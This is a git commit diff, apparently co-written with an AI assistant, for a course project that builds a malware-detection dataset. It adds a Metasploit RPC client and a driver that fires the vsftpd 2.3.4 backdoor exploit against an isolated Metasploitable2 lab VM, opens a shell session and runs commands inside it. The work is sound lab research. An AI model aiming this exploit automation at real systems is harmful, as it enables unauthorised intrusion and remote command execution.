Tier 3: msfrpc-driven exploit driver + first module config

Adds the Tier-3 exploit driver — an MSFExploitDriver that plugs into
EpisodeRunner.on_phase, fires a Metasploit module against a target VM
via msfrpcd, watches for the resulting session, and stamps each
transition (exploit_fire, session_open, session_landing_probe,
sample_executed, session_dormant, session_killed) into the episode's
events.jsonl on the orchestrator's monotonic clock.

What landed:
- exploits/msfrpc.py — minimal msgpack-over-HTTPS client (auth,
  module.execute, job/session lifecycle) so we don't depend on a
  third-party MSF wrapper.
- exploits/driver.py — phase-to-msfrpc adapter; idempotent fire,
  session-open polling with timeout, workload start/stop, teardown.
- exploits/modules.py + exploits/modules/vsftpd_234_backdoor.toml —
  TOML module configs with {{ target_ip }} placeholders, replacing the
  imperative .rc-script approach the README previously hinted at.
- vm/launch_target.sh — SLIRP+restrict=on launcher for the
  intentionally-vulnerable target VM (host can reach guest via
  hostfwd, guest cannot reach host or internet).
- tools/run_tier3_demo.py — end-to-end runner mirroring run_real_vm_demo.
- tests/test_exploits.py — 12 new tests against a fake MSFRpcClient,
  including an integration test that drives a real EpisodeRunner.

Plumbing changes:
- EpisodeRunner._emit_event → public emit_event, so external drivers
  share the runner's monotonic clock and events.jsonl.
- mkdir for episode_dir moved to __init__ so emit_event is callable
  before run() (driver_setup fires pre-schedule).

Status: driver + tests pass (40/40); end-to-end against a live msfrpcd
+ Metasploitable2 image is the next bring-up step.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This commit is contained in:
max 2026-04-29 23:11:52 -05:00
parent 7216ec09bd
commit 613c6fa223
13 changed files with 1331 additions and 23 deletions

View file

@ -73,9 +73,16 @@ above produces from real KVM behaviour.
|---|---|---|
| 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done |
| 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done |
| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 |
| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🟡 driver landed, integration pending |
| 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 |
The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny
msgpack-over-HTTPS msfrpc client plus an `MSFExploitDriver` plugged
into the orchestrator as the `on_phase` callback. First canned module:
`exploits/modules/vsftpd_234_backdoor.toml` (Metasploitable2's
CVE-2011-2523). End-to-end integration needs `msfrpcd` running and a
Metasploitable2 image at `vm/images/`, which is the next bring-up step.
For an interactive view of any episode (zoom/pan/hover), run:
```sh
@ -93,8 +100,8 @@ tools/show_envelope.sh data/episodes/<episode_id>
- ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end
- ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid
- ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition
- 🟡 **Tier 3 — exploit driver:** `MSFExploitDriver` + msfrpc client + first module config landed (`exploits/`); end-to-end run against a live `msfrpcd` + Metasploitable2 image still pending.
- 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5)
- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open`
- 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified)
> **Topology note:** in this project the **Pi5 is the WireGuard-side
@ -182,7 +189,7 @@ late-boot disk write. That's a real KVM guest you're seeing.
| `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent |
| `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) |
| `tools/` | Demo runners, load mimic, plot scripts |
| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) |
| [`exploits/`](exploits/README.md) | MSF RPC client + driver + per-module TOML configs (Tier 3) |
| `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** |
| `training/` | Model training code (deferred — schema first) |
| `etc/` | systemd units and config templates installed by the deploy scripts |

View file

@ -171,6 +171,10 @@ thing plays in our pipeline.
- **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to
produce the NoCloud cidata ISO without depending on system mkisofs/
xorriso. https://clalancette.github.io/pycdlib/
- **msgpack** — binary serialization used by Metasploit's RPC API. The
Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't
pull in a higher-level Metasploit Python client.
https://msgpack.org
---

View file

@ -1,12 +1,92 @@
# exploits/
Metasploit resource scripts (`*.rc`) that drive specific exploit modules
deterministically — same inputs, same module options, every time.
The Tier-3 exploit driver — fires a Metasploit module against a
vulnerable target VM, watches for the resulting session, and stamps the
session-open transition into the episode's `events.jsonl` so the
labeler can mark `armed → infecting` honestly.
Each script:
- Sets `RHOSTS` to the guest's bridge IP.
- Sets a payload that opens a session usable for sample upload + execute.
- Avoids any options that introduce randomness in the exploit fire timing
(so that the `armed → infecting` transition lands at a predictable offset).
## Layout
These scripts pair with public Metasploit modules. We do not author exploits.
```
exploits/
msfrpc.py tiny msgpack-over-HTTPS client for msfrpcd
driver.py MSFExploitDriver — plugged in as EpisodeRunner.on_phase
modules.py ModuleConfig + TOML loader
modules/
vsftpd_234_backdoor.toml first canned module (Metasploitable2)
...
```
## Module configs
Each `modules/*.toml` describes one Metasploit module — its path, the
options to set, and the payload to use. The driver reads these files
to drive `module.execute` over msfrpc.
```toml
description = "..."
[module]
type = "exploit" # exploit | auxiliary | post
path = "unix/ftp/vsftpd_234_backdoor"
[module.options]
RHOSTS = "{{ target_ip }}" # placeholder substituted at runtime
RPORT = 21
[payload]
path = "cmd/unix/interact"
[payload.options] # optional
# LHOST = "{{ target_ip }}"
[session]
type = "shell"
```
The only placeholder supported today is `{{ target_ip }}`. Add more in
`exploits/modules.py::ModuleConfig.render_options` when needed.
## Running
```sh
# 1. Start msfrpcd locally:
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
# 2. Drop a vulnerable target image at vm/images/<name>.qcow2 (e.g.
# Metasploitable2 — see docs/sources.md for sha256).
# 3. Drive an episode:
MSFRPC_PASSWORD=<password> uv run python tools/run_tier3_demo.py \
--module vsftpd_234_backdoor \
--target-port 21 \
--data-root data
```
The episode's `events.jsonl` will contain:
```
driver_setup — module + target snapshotted before fire
exploit_fire — module.execute issued
session_open — new session id observed in session.list
session_landing_probe — first command response (id) recorded
sample_executed — workload kicked off inside the session
session_dormant — workload killed
session_killed — session.stop at episode end
```
These pair with the standard phase labels in `labels.jsonl` so a
downstream loader can reconcile "what the orchestrator scheduled"
against "what actually happened on the wire".
## Adding a module
1. Drop a TOML at `exploits/modules/<name>.toml` per the schema above.
2. Pick a payload that works without a callback channel until the
`br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP +
`restrict=on` blocks reverse-tcp by design). `cmd/unix/interact`
and other "session on the same socket" payloads are safe.
3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module <name>`.
4. The new module is automatically picked up by `tools/run_tier3_demo.py`
via `--module <name>`; no driver code changes needed.
We do **not** author exploits or modify upstream Metasploit code. The
driver is a pure adapter from the project's phase machine to msfrpc.

0
exploits/__init__.py Normal file
View file

205
exploits/driver.py Normal file
View file

@ -0,0 +1,205 @@
"""Tier-3 exploit driver.
Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates
the closed phase enum into msfrpc actions:
clean idle. (no-op; exploit hasn't fired yet)
armed module loaded + options applied; module fires
with ``module.execute``. Driver records the fire
timestamp via ``emit_event`` so the labeler can
align ``armed`` with what's actually happening.
infecting poll for a new session; on session_open, run a
one-shot landing command (``id`` or similar) so
we have a clear "session is responsive" event.
infected_running start observable workload inside the session.
dormant kill the workload, leave the session alive.
reverting kill session, snapshot revert handled by caller.
The events the driver writes match the schema in ``docs/data-model.md``:
``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``,
``session_killed``.
The driver does NOT author exploits or pick payloads at runtime those
choices live in ``exploits/modules/*.toml``. The driver is a pure
adapter between the phase machine and msfrpc.
"""
from __future__ import annotations
import logging
import time
from dataclasses import dataclass
from typing import Callable
from .modules import ModuleConfig
from .msfrpc import MSFRpcClient, wait_for_new_session
log = logging.getLogger("cis490.exploits.driver")
EmitEvent = Callable[..., None]
@dataclass
class DriverConfig:
target_ip: str
session_open_timeout_s: float = 30.0
# Workload command used to mimic XMRig-class infected_running shape
# in a real session. Kept simple on purpose — anything observable
# from outside the guest works for the dataset; we'll drop in a
# real sample at Tier 4.
workload_cmd: str = "yes > /dev/null"
# How we kill the workload at dormant time.
workload_kill_cmd: str = "pkill yes; true"
class MSFExploitDriver:
"""Phase-to-msfrpc adapter. One instance per episode."""
def __init__(
self,
client: MSFRpcClient,
module: ModuleConfig,
cfg: DriverConfig,
emit_event: EmitEvent,
) -> None:
self.client = client
self.module = module
self.cfg = cfg
self.emit = emit_event
self._sessions_seen_at_arm: set[int] = set()
self._session_id: int | None = None
self._job_id: int | str | None = None
self._fired = False
# ---- lifecycle ------------------------------------------------------
def setup(self) -> None:
"""Authenticate and snapshot the pre-existing session set so we
can recognize a *new* session as the one we just opened."""
self.client.login()
self._sessions_seen_at_arm = set(self.client.session_list().keys())
self.emit(
"driver_setup",
module=self.module.module_path,
payload=self.module.payload_path,
target_ip=self.cfg.target_ip,
preexisting_sessions=sorted(self._sessions_seen_at_arm),
)
def teardown(self) -> None:
if self._session_id is not None:
try:
self.client.session_stop(self._session_id)
self.emit("session_killed", session_id=self._session_id)
except Exception:
log.exception("session.stop on %s", self._session_id)
if self._job_id is not None:
try:
self.client.job_stop(self._job_id)
except Exception:
log.debug("job.stop on %s (often already gone)", self._job_id)
self.client.logout()
# ---- phase callback -------------------------------------------------
def set_phase(self, phase: str) -> None:
log.info("driver phase -> %s", phase)
if phase == "clean":
return
if phase == "armed":
self._fire()
elif phase == "infecting":
self._await_session()
elif phase == "infected_running":
self._start_workload()
elif phase == "dormant":
self._stop_workload()
elif phase == "reverting":
self.teardown()
else:
log.warning("unknown phase: %s", phase)
# ---- actions --------------------------------------------------------
def _fire(self) -> None:
if self._fired:
log.debug("module already fired; skipping re-fire")
return
opts = self.module.render_options(target_ip=self.cfg.target_ip)
self.emit(
"exploit_fire",
module=self.module.module_path,
options={k: v for k, v in opts.items() if k != "PASSWORD"},
)
resp = self.client.module_execute(
self.module.module_type, self.module.module_path, opts,
)
self._job_id = resp.get("job_id")
self._fired = True
def _await_session(self) -> None:
if self._session_id is not None:
return
result = wait_for_new_session(
self.client,
seen=self._sessions_seen_at_arm,
timeout_s=self.cfg.session_open_timeout_s,
)
if result is None:
self.emit(
"session_open_timeout",
module=self.module.module_path,
timeout_s=self.cfg.session_open_timeout_s,
)
log.warning(
"no session opened within %.1fs", self.cfg.session_open_timeout_s,
)
return
sid, info = result
self._session_id = sid
self.emit(
"session_open",
session_id=sid,
session_type=info.get("type"),
tunnel_peer=info.get("tunnel_peer"),
)
# Landing probe so we have a known-good RTT marker on the wire.
try:
self.client.session_shell_write(sid, "id")
time.sleep(0.5)
out = self.client.session_shell_read(sid)
self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256])
except Exception:
log.exception("landing probe on session %s", sid)
def _start_workload(self) -> None:
if self._session_id is None:
log.warning("infected_running with no session — skipping workload")
return
self.client.session_shell_write(
self._session_id,
f"nohup sh -c {_shquote(self.cfg.workload_cmd)} </dev/null "
f">/dev/null 2>&1 & disown",
)
self.emit(
"sample_executed",
session_id=self._session_id,
command=self.cfg.workload_cmd,
)
def _stop_workload(self) -> None:
if self._session_id is None:
return
self.client.session_shell_write(
self._session_id, self.cfg.workload_kill_cmd,
)
self.emit("session_dormant", session_id=self._session_id)
def _shquote(s: str) -> str:
# Minimal POSIX single-quote escaping. The workload command is set
# by us, not by anything user-controlled, so we just need to handle
# embedded single quotes correctly for completeness.
return "'" + s.replace("'", "'\\''") + "'"

97
exploits/modules.py Normal file
View file

@ -0,0 +1,97 @@
"""TOML loader for exploit-module configs.
Each ``exploits/modules/*.toml`` describes one Metasploit module its
path, the options to set, the payload to use, and how the driver
should treat the resulting session. The driver consumes ``ModuleConfig``
objects; the TOML files are the on-disk source of truth.
Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are
imperative and assume an interactive console; the driver needs the
*structured* options to push them through msfrpc. TOML is the simplest
way to express a small typed map of options and it round-trips
cleanly into ``meta.json`` for episode reproducibility.
"""
from __future__ import annotations
import tomllib
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any
_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"}
@dataclass(frozen=True)
class ModuleConfig:
name: str # short id, e.g. "vsftpd_234_backdoor"
module_type: str # "exploit" | "auxiliary" | "post"
module_path: str # e.g. "unix/ftp/vsftpd_234_backdoor"
options: dict[str, Any] = field(default_factory=dict)
payload_path: str | None = None # e.g. "cmd/unix/interact"
payload_options: dict[str, Any] = field(default_factory=dict)
expected_session_type: str = "shell" # what we'll get on success
description: str = ""
def render_options(self, *, target_ip: str) -> dict[str, Any]:
"""Substitute ``{{ target_ip }}`` placeholders in options.
Module configs use Jinja-style placeholders for any value that
isn't known until episode time (RHOSTS, LHOST, etc.). Today the
only supported placeholder is ``target_ip``; if more are needed
later, generalize here."""
out: dict[str, Any] = {}
for k, v in self.options.items():
if isinstance(v, str) and "{{" in v:
out[k] = (
v.replace("{{ target_ip }}", target_ip)
.replace("{{target_ip}}", target_ip)
)
else:
out[k] = v
# MSF requires PAYLOAD as a top-level option even though we
# carry it in a separate field on the config.
if self.payload_path:
out["PAYLOAD"] = self.payload_path
for k, v in self.payload_options.items():
if isinstance(v, str) and "{{" in v:
v = (
v.replace("{{ target_ip }}", target_ip)
.replace("{{target_ip}}", target_ip)
)
out[k] = v
return out
def load_module_config(path: Path) -> ModuleConfig:
raw = tomllib.loads(path.read_text())
mod = raw.get("module") or {}
module_path = mod.get("path")
module_type = mod.get("type", "exploit")
if not isinstance(module_path, str) or not module_path:
raise ValueError(f"{path}: module.path must be a non-empty string")
if module_type not in _VALID_MODULE_TYPES:
raise ValueError(
f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}"
)
options = (raw.get("module", {}).get("options") or {}) | (raw.get("options") or {})
payload = raw.get("payload") or {}
return ModuleConfig(
name=path.stem,
module_type=module_type,
module_path=module_path,
options=dict(options),
payload_path=payload.get("path"),
payload_options=dict(payload.get("options") or {}),
expected_session_type=raw.get("session", {}).get("type", "shell"),
description=raw.get("description", ""),
)
def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
"""Load every ``*.toml`` under ``directory``, keyed by short name."""
return {
p.stem: load_module_config(p)
for p in sorted(directory.glob("*.toml"))
}

View file

@ -0,0 +1,23 @@
description = """
vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP
USER name ending with ':)'. Standard Metasploitable2 exploit, fully
deterministic perfect for a Tier-3 first-light run because the
exploit fire timing is bounded by a single FTP round-trip.
"""
[module]
type = "exploit"
path = "unix/ftp/vsftpd_234_backdoor"
[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 21
# The exploit returns its own command shell — we drive it with a
# minimal cmd/unix/interact payload so the session lands as a plain
# shell session usable by session.shell_write/read.
[payload]
path = "cmd/unix/interact"
[session]
type = "shell"

231
exploits/msfrpc.py Normal file
View file

@ -0,0 +1,231 @@
"""Tiny Metasploit RPC client — just enough for the Tier-3 driver.
We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is
huge; this client implements only the verbs we actually call:
auth.login get a token
auth.logout release the token
module.execute fire an exploit (or aux) module by name
job.list / job.stop manage the running module
session.list see opened sessions, find the one we just opened
session.shell_write/read run commands in a shell session
session.stop kill a session at episode end
Why not pull in pymetasploit3? Two reasons:
- msfrpcd's protocol is small enough that owning it removes a third-party
dep (and a maintenance risk on a course project).
- the parts we need (session opening, shell commands, job lifecycle)
are simple, and we want full visibility into what's on the wire when
debugging an exploit fire.
The client is intentionally synchronous; the Tier-3 driver runs in the
orchestrator's main thread alongside the collector, and a session-open
poll of a few hundred milliseconds is well within budget.
"""
from __future__ import annotations
import http.client
import logging
import socket
import ssl
import time
from dataclasses import dataclass
from typing import Any
try:
import msgpack # type: ignore[import-untyped]
except ImportError as e: # pragma: no cover - import-time guard
raise ImportError(
"the msgpack package is required for the MSF RPC client. "
"install it with: pip install msgpack"
) from e
log = logging.getLogger("cis490.msfrpc")
class MSFRpcError(RuntimeError):
"""Raised when msfrpcd returns an error or a malformed response."""
@dataclass
class MSFRpcConfig:
host: str = "127.0.0.1"
port: int = 55553
user: str = "msf"
password: str = ""
ssl: bool = True
timeout_s: float = 30.0
# msfrpcd's default cert is self-signed — most callers will run
# against localhost where this is the right tradeoff. Override
# explicitly for any non-loopback host.
verify: bool = False
class MSFRpcClient:
"""Synchronous msfrpcd client. Token is acquired on ``login()`` and
re-used on every subsequent call. Not thread-safe; the driver owns
one client per episode."""
def __init__(self, cfg: MSFRpcConfig) -> None:
self.cfg = cfg
self._token: str | None = None
# ---- session management --------------------------------------------
def login(self) -> None:
resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password)
if resp.get("result") != "success" or "token" not in resp:
raise MSFRpcError(f"auth.login failed: {resp!r}")
self._token = resp["token"]
log.info("msfrpc auth.login ok (token=%s...)", self._token[:8])
def logout(self) -> None:
if self._token is None:
return
try:
self._call("auth.logout", self._token)
except MSFRpcError as e:
log.warning("msfrpc auth.logout: %s", e)
finally:
self._token = None
# ---- modules --------------------------------------------------------
def module_execute(
self,
module_type: str,
module_name: str,
options: dict[str, Any],
) -> dict[str, Any]:
"""Fire a module. Returns ``{"job_id": int, "uuid": str}``."""
resp = self._call("module.execute", module_type, module_name, options)
if "job_id" not in resp:
raise MSFRpcError(f"module.execute returned no job_id: {resp!r}")
log.info(
"module.execute %s/%s -> job_id=%s uuid=%s",
module_type, module_name, resp["job_id"], resp.get("uuid"),
)
return resp
# ---- jobs -----------------------------------------------------------
def job_list(self) -> dict[str, str]:
return self._call("job.list")
def job_stop(self, job_id: int | str) -> dict[str, Any]:
# msfrpcd accepts the id as a string.
return self._call("job.stop", str(job_id))
# ---- sessions -------------------------------------------------------
def session_list(self) -> dict[int, dict[str, Any]]:
raw = self._call("session.list")
# msfrpcd keys session ids as ints in msgpack but some versions
# round-trip them as strings. Normalize.
out: dict[int, dict[str, Any]] = {}
for k, v in (raw or {}).items():
try:
out[int(k)] = v
except (TypeError, ValueError):
pass
return out
def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]:
if not data.endswith("\n"):
data = data + "\n"
return self._call("session.shell_write", session_id, data)
def session_shell_read(self, session_id: int) -> str:
resp = self._call("session.shell_read", session_id)
return resp.get("data", "") if isinstance(resp, dict) else ""
def session_stop(self, session_id: int) -> dict[str, Any]:
return self._call("session.stop", session_id)
# ---- transport ------------------------------------------------------
def _call(self, method: str, *args: Any) -> dict[str, Any]:
if self._token is None:
raise MSFRpcError("not authenticated; call login() first")
return self._raw_call([method, self._token, *args])
def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]:
return self._raw_call([method, *args])
def _raw_call(self, payload: list[Any]) -> dict[str, Any]:
body = msgpack.packb(payload, use_bin_type=False)
conn = self._open_conn()
try:
conn.request(
"POST",
"/api/",
body=body,
headers={
"Content-Type": "binary/message-pack",
"Content-Length": str(len(body)),
"Connection": "close",
},
)
r = conn.getresponse()
raw = r.read()
if r.status != 200:
raise MSFRpcError(
f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}"
)
except (socket.error, http.client.HTTPException) as e:
raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e
finally:
conn.close()
try:
decoded = msgpack.unpackb(raw, raw=False)
except Exception as e:
raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e
if isinstance(decoded, dict) and decoded.get("error") is True:
raise MSFRpcError(
f"{payload[0]!r}: {decoded.get('error_class')} "
f"{decoded.get('error_message')}"
)
if not isinstance(decoded, dict):
# session.list and friends can legitimately return {} or a dict,
# but never a non-dict — anything else is a protocol violation.
raise MSFRpcError(
f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}"
)
return decoded
def _open_conn(self) -> http.client.HTTPConnection:
if self.cfg.ssl:
ctx = ssl.create_default_context()
if not self.cfg.verify:
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return http.client.HTTPSConnection(
self.cfg.host, self.cfg.port,
timeout=self.cfg.timeout_s, context=ctx,
)
return http.client.HTTPConnection(
self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s,
)
def wait_for_new_session(
client: MSFRpcClient,
*,
seen: set[int],
timeout_s: float,
poll_s: float = 0.25,
) -> tuple[int, dict[str, Any]] | None:
"""Poll ``session.list`` until a session id we haven't seen before
appears, or until timeout. Returns ``(session_id, info)`` or None."""
deadline = time.monotonic() + timeout_s
while time.monotonic() < deadline:
sessions = client.session_list()
for sid, info in sessions.items():
if sid not in seen:
return sid, info
time.sleep(poll_s)
return None

View file

@ -83,20 +83,24 @@ class EpisodeRunner:
self.on_phase = on_phase
self.episode_id = cfg.episode_id or new_ulid()
self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id
# Create the dir up front so external drivers can call
# emit_event() between construction and run() — e.g. an exploit
# driver that writes a driver_setup event before the schedule
# walks. The dir is otherwise empty until run() opens files.
self.episode_dir.mkdir(parents=True, exist_ok=True)
self._t_mono_origin_ns: int = 0
self._stop = threading.Event()
# ---- public ---------------------------------------------------------
def run(self) -> EpisodeResult:
self.episode_dir.mkdir(parents=True, exist_ok=True)
self._t_mono_origin_ns = time.monotonic_ns()
started_at_wall = datetime.now(timezone.utc).isoformat()
meta = self._initial_meta(started_at_wall)
self._write_meta(meta)
self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name)
self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)
rows_holder: dict[str, int] = {"rows": 0}
@ -124,13 +128,9 @@ class EpisodeRunner:
self._stop.set()
t.join(timeout=2.0)
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
pid_alive = _pid_alive(self.cfg.target_pid)
self._emit_event(
end_mono_ns,
"episode_end",
target_pid_alive=pid_alive,
)
self.emit_event("episode_end", target_pid_alive=pid_alive)
end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
meta["result"] = {
@ -171,9 +171,7 @@ class EpisodeRunner:
break
t_mono = time.monotonic_ns() - self._t_mono_origin_ns
self._emit_label(t_mono, phase, prev=prev, reason="scheduled")
self._emit_event(
t_mono, "phase_transition", to=phase, prev=prev
)
self.emit_event("phase_transition", to=phase, prev=prev)
if self.on_phase is not None:
try:
self.on_phase(phase)
@ -220,7 +218,15 @@ class EpisodeRunner:
f.write("\n")
os.replace(tmp, path)
def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None:
def emit_event(self, event: str, **extra) -> None:
"""Append a row to events.jsonl. Public so external drivers
(e.g. the MSF exploit driver) can stamp their own events with
the same monotonic clock the orchestrator is using."""
t_mono_ns = (
time.monotonic_ns() - self._t_mono_origin_ns
if self._t_mono_origin_ns
else 0
)
row = {
"t_mono_ns": t_mono_ns,
"t_wall_ns": time.time_ns(),

View file

@ -6,6 +6,7 @@ requires-python = ">=3.11"
dependencies = [
"starlette>=0.36",
"uvicorn[standard]>=0.27",
"msgpack>=1.0", # MSF RPC wire format for the Tier-3 exploit driver
]
[dependency-groups]

318
tests/test_exploits.py Normal file
View file

@ -0,0 +1,318 @@
"""Tests for the Tier-3 exploit driver and its module loader.
The msfrpc transport itself is exercised against a fake client so the
suite runs in-process. A live-msfrpcd integration test is out of
scope here the wire format is small and the high-value coverage is
the phase-to-action mapping plus the events the driver emits.
"""
from __future__ import annotations
import json
from pathlib import Path
from typing import Any
import pytest
from exploits.driver import DriverConfig, MSFExploitDriver
from exploits.modules import ModuleConfig, load_module_config
REPO_ROOT = Path(__file__).resolve().parent.parent
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
# -----------------------------------------------------------------------
# Module config loader
# -----------------------------------------------------------------------
def test_load_vsftpd_module_config_round_trip() -> None:
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
assert cfg.name == "vsftpd_234_backdoor"
assert cfg.module_type == "exploit"
assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor"
assert cfg.options["RPORT"] == 21
assert cfg.options["RHOSTS"] == "{{ target_ip }}"
assert cfg.payload_path == "cmd/unix/interact"
def test_render_options_substitutes_target_ip() -> None:
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
rendered = cfg.render_options(target_ip="10.200.0.10")
assert rendered["RHOSTS"] == "10.200.0.10"
assert rendered["RPORT"] == 21
assert rendered["PAYLOAD"] == "cmd/unix/interact"
def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
p = tmp_path / "x.toml"
p.write_text(
'[module]\n'
'type = "exploit"\n'
'path = "unix/ftp/example"\n'
'[module.options]\n'
'RHOSTS = "{{target_ip}}"\n'
'LHOST = "{{ target_ip }}"\n'
)
cfg = load_module_config(p)
rendered = cfg.render_options(target_ip="10.0.0.5")
assert rendered["RHOSTS"] == "10.0.0.5"
assert rendered["LHOST"] == "10.0.0.5"
def test_load_rejects_missing_module_path(tmp_path: Path) -> None:
p = tmp_path / "bad.toml"
p.write_text('[module]\ntype = "exploit"\n')
with pytest.raises(ValueError, match="module.path"):
load_module_config(p)
def test_load_rejects_unknown_module_type(tmp_path: Path) -> None:
p = tmp_path / "bad.toml"
p.write_text(
'[module]\ntype = "evil"\npath = "unix/ftp/x"\n'
)
with pytest.raises(ValueError, match="module.type"):
load_module_config(p)
# -----------------------------------------------------------------------
# Exploit driver — phase transitions against a fake MSFRpcClient
# -----------------------------------------------------------------------
class FakeMSFRpcClient:
"""Stand-in that records every method called and lets a test
script the apparent state of msfrpcd (sessions, return values)."""
def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None:
self.calls: list[tuple[str, tuple, dict]] = []
self.logged_in = False
self._fired = False
self._sessions: dict[int, dict[str, Any]] = {}
self._sessions_after_fire = sessions_after_fire or {}
self.shell_writes: list[tuple[int, str]] = []
def _record(self, name: str, *args, **kwargs) -> None:
self.calls.append((name, args, kwargs))
def login(self) -> None:
self._record("login")
self.logged_in = True
def logout(self) -> None:
self._record("logout")
self.logged_in = False
def session_list(self) -> dict[int, dict[str, Any]]:
self._record("session_list")
return dict(self._sessions)
def module_execute(self, mtype: str, mname: str, opts: dict) -> dict:
self._record("module_execute", mtype, mname, opts)
self._fired = True
# Simulate sessions appearing after the exploit fires.
self._sessions = dict(self._sessions_after_fire)
return {"job_id": 7, "uuid": "fake-uuid"}
def job_stop(self, job_id) -> dict:
self._record("job_stop", job_id)
return {"result": "success"}
def session_shell_write(self, sid: int, data: str) -> dict:
self._record("session_shell_write", sid, data)
if not data.endswith("\n"):
data = data + "\n"
self.shell_writes.append((sid, data))
return {"write_count": str(len(data))}
def session_shell_read(self, sid: int) -> str:
self._record("session_shell_read", sid)
return "uid=0(root) gid=0(root)\n"
def session_stop(self, sid: int) -> dict:
self._record("session_stop", sid)
self._sessions.pop(sid, None)
return {"result": "success"}
def _make_driver(
sessions_after_fire: dict[int, dict[str, Any]] | None = None,
target_ip: str = "10.200.0.10",
) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]:
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire)
events: list[tuple[str, dict]] = []
def emit(event: str, **extra: Any) -> None:
events.append((event, extra))
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip=target_ip,
session_open_timeout_s=0.5, # tests must not block
),
emit_event=emit,
)
return driver, client, events
def test_driver_setup_authenticates_and_snapshots_sessions() -> None:
driver, client, events = _make_driver()
client._sessions = {99: {"type": "shell"}} # pre-existing session
driver.setup()
assert client.logged_in is True
assert driver._sessions_seen_at_arm == {99}
assert events[0][0] == "driver_setup"
assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor"
assert events[0][1]["target_ip"] == "10.200.0.10"
def test_full_phase_walk_emits_expected_event_order() -> None:
driver, client, events = _make_driver(
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "10.200.0.10:21"}},
)
driver.setup()
for phase in [
"clean", "armed", "infecting",
"infected_running", "dormant",
"infected_running", "dormant",
"clean",
]:
driver.set_phase(phase)
driver.teardown()
names = [e[0] for e in events]
# Order matters: fire comes before session_open, which comes before
# workload, which comes before kill+logout.
assert names.index("exploit_fire") < names.index("session_open")
assert names.index("session_open") < names.index("session_landing_probe")
assert names.index("session_landing_probe") < names.index("sample_executed")
assert names.count("sample_executed") == 2 # two infected_running phases
assert names.count("session_dormant") == 2
assert "session_killed" in names
# Driver should have asked the FakeClient to fire exactly once.
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
assert len(fire_calls) == 1
_, args, _ = fire_calls[0]
assert args[1] == "unix/ftp/vsftpd_234_backdoor"
assert args[2]["RHOSTS"] == "10.200.0.10"
assert args[2]["PAYLOAD"] == "cmd/unix/interact"
def test_session_open_timeout_emits_timeout_event() -> None:
# No sessions ever appear after fire.
driver, client, events = _make_driver(sessions_after_fire={})
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
names = [e[0] for e in events]
assert "session_open_timeout" in names
assert "session_open" not in names
def test_workload_phases_are_no_op_without_session() -> None:
driver, client, events = _make_driver(sessions_after_fire={})
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting") # times out, no session
driver.set_phase("infected_running")
driver.set_phase("dormant")
# No shell writes should have happened.
